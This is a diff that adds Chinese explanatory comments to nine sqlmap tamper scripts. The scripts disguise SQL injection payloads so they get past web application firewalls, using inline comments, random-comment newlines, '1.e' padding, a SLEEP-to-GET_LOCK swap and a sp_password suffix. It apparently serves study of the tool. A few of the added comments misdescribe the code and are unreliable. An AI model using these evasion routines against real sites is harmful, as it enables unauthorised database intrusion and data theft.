sck

src/sqlmap-master/tamper/randomcomments.py

@@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
 
 import re
 
+# 从sqlmap的库中导入随机范围函数、兼容模块中的xrange函数、知识库和优先级枚举
 from lib.core.common import randomRange
 from lib.core.compat import xrange
 from lib.core.data import kb
@@ -27,24 +28,28 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式找到payload中的所有单词（至少一个字母或下划线）
         for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
             word = match.group()
 
+            # 跳过长度小于2的单词
             if len(word) < 2:
                 continue
 
+            # 如果单词是SQL关键字        
             if word.upper() in kb.keywords:
-                _ = word[0]
-
+                _ = word[0]  # 从单词的第一个字符开始构造新的字符串
+                # 遍历单词的每个字符（除了第一个和最后一个）
                 for i in xrange(1, len(word) - 1):
+                    # 随机决定是否插入注释
                     _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
-
+                # 添加单词的最后一个字符
                 _ += word[-1]
-
+                # 如果没有插入任何注释，则随机选择一个位置插入注释
                 if "/**/" not in _:
                     index = randomRange(1, len(word) - 1)
                     _ = word[:index] + "/**/" + word[index:]
-
+                # 将原始的单词替换为插入了注释的新字符串
                 retVal = retVal.replace(word, _)
 
     return retVal

src/sqlmap-master/tamper/schemasplit.py

@@ -27,5 +27,6 @@ def tamper(payload, **kwargs):
     >>> tamper('SELECT id FROM testdb.users')
     'SELECT id FROM testdb 9.e.users'
     """
-
+    # 如果payload不为空，则使用正则表达式替换FROM后面数据库表名的点操作符为一个空格加上'9.e.'
+    # 这是一种绕过某些WAF规则的技术，通过插入一个看似无害的字符串'9.e.'来分割数据库名和表名
     return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload

src/sqlmap-master/tamper/scientific.py

@@ -29,7 +29,9 @@ def tamper(payload, **kwargs):
     """
 
     if payload:
+        # 将闭合括号、逗号、点、星号、正斜杠、反斜杠、竖线、位运算符和逻辑运算符替换为" 1.e" + 原字符
         payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload)
+        # 将函数名后跟左括号替换为" 函数名 1.e("，除非函数名是MID、CAST、FROM、COUNT
         payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload)     # NOTE: MID and CAST don't work for sure
-
+    # 返回修改后的payload    
     return payload

src/sqlmap-master/tamper/sleep2getlock.py

@@ -34,6 +34,7 @@ def tamper(payload, **kwargs):
     """
 
     if payload:
+        # 将payload中的'SLEEP('替换为'GET_LOCK('%s',，其中'%s'会被kb.aliasName替换
         payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName)
 
     return payload

src/sqlmap-master/tamper/sp_password.py

@@ -27,6 +27,9 @@ def tamper(payload, **kwargs):
     retVal = ""
 
     if payload:
+        # 构造返回的payload字符串
+        # 如果payload中已经包含注释符号('#'或'--')，则直接添加sp_password函数
+        # 否则，在sp_password前添加一个'-- '作为注释
         retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
 
     return retVal

src/sqlmap-master/tamper/space2comment.py

@@ -4,7 +4,7 @@
 Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
-
+# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举
 from lib.core.compat import xrange
 from lib.core.enums import PRIORITY
 
@@ -33,26 +33,28 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        retVal = ""
+        retVal = "" # 初始化引号状态标记
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果是第一个空格且之前没有遇到过空格
             if not firstspace:
                 if payload[i].isspace():
                     firstspace = True
                     retVal += "/**/"
                     continue
-
+            # 如果是单引号
             elif payload[i] == '\'':
                 quote = not quote
-
+            # 如果是双引号
             elif payload[i] == '"':
                 doublequote = not doublequote
-
+            # 如果是空格且之前没有遇到过双引号和单引号
             elif payload[i] == " " and not doublequote and not quote:
                 retVal += "/**/"
                 continue
-
+            # 添加当前字符到retVal
             retVal += payload[i]
 
     return retVal

src/sqlmap-master/tamper/space2dash.py

@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 import random
 import string
 
+# 从sqlmap的库中导入兼容模块中的xrange函数和优先级枚举
 from lib.core.compat import xrange
 from lib.core.enums import PRIORITY
 
@@ -30,18 +31,29 @@ def tamper(payload, **kwargs):
     >>> tamper('1 AND 9227=9227')
     '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
     """
-
+    
     retVal = ""
 
     if payload:
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
-            if payload[i].isspace():
+            # 如果当前字符是空格
+            if payload[i].isspace():    
+                # 生成一个随机字符串
                 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
+                # 将随机字符串和换行符添加到retVal中
                 retVal += "--%s%%0A" % randomStr
+
+            # 如果当前字符是#或者#后面跟着两个空格
+            # 如果payload[i]等于#或者payload[i:i + 3]等于--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload[i:]添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则，将payload[i]添加到retVal中
             else:
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal

src/sqlmap-master/tamper/space2hash.py

@@ -16,7 +16,9 @@ from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOW
 
+# 定义一个函数，用于检查脚本依赖
 def dependencies():
+    # 输出警告信息，提示脚本只能运行在MySQL数据库上
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
 def tamper(payload, **kwargs):
@@ -41,15 +43,26 @@ def tamper(payload, **kwargs):
 
     retVal = ""
 
+    # 如果payload不为空
     if payload:
+        # 遍历payload的每个字符
         for i in xrange(len(payload)):
+            # 如果字符是空格
             if payload[i].isspace():
+                # 生成一个随机字符串
                 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
+                # 将随机字符串添加到retVal中
                 retVal += "%%23%s%%0A" % randomStr
+            # 如果字符是#或者字符是--
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
+                # 将payload的剩余部分添加到retVal中
                 retVal += payload[i:]
+                # 跳出循环
                 break
+            # 否则
             else:
+                # 将字符添加到retVal中
                 retVal += payload[i]
 
+    # 返回retVal
     return retVal

src/sqlmap-master/tamper/space2morecomment.py

@@ -33,23 +33,29 @@ def tamper(payload, **kwargs):
         retVal = ""
         quote, doublequote, firstspace = False, False, False
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果第一个字符不是空格，则将firstspace设置为True，并将retVal添加"/**_**/"
             if not firstspace:
                 if payload[i].isspace():
                     firstspace = True
                     retVal += "/**_**/"
                     continue
 
+            # 如果字符是单引号，则将quote取反
             elif payload[i] == '\'':
                 quote = not quote
 
+            # 如果字符是双引号，则将doublequote取反
             elif payload[i] == '"':
                 doublequote = not doublequote
 
+            # 如果字符是空格，且不是在双引号或单引号中，则将retVal添加"/**_**/"
             elif payload[i] == " " and not doublequote and not quote:
                 retVal += "/**_**/"
                 continue
 
+            # 将字符添加到retVal中
             retVal += payload[i]
 
     return retVal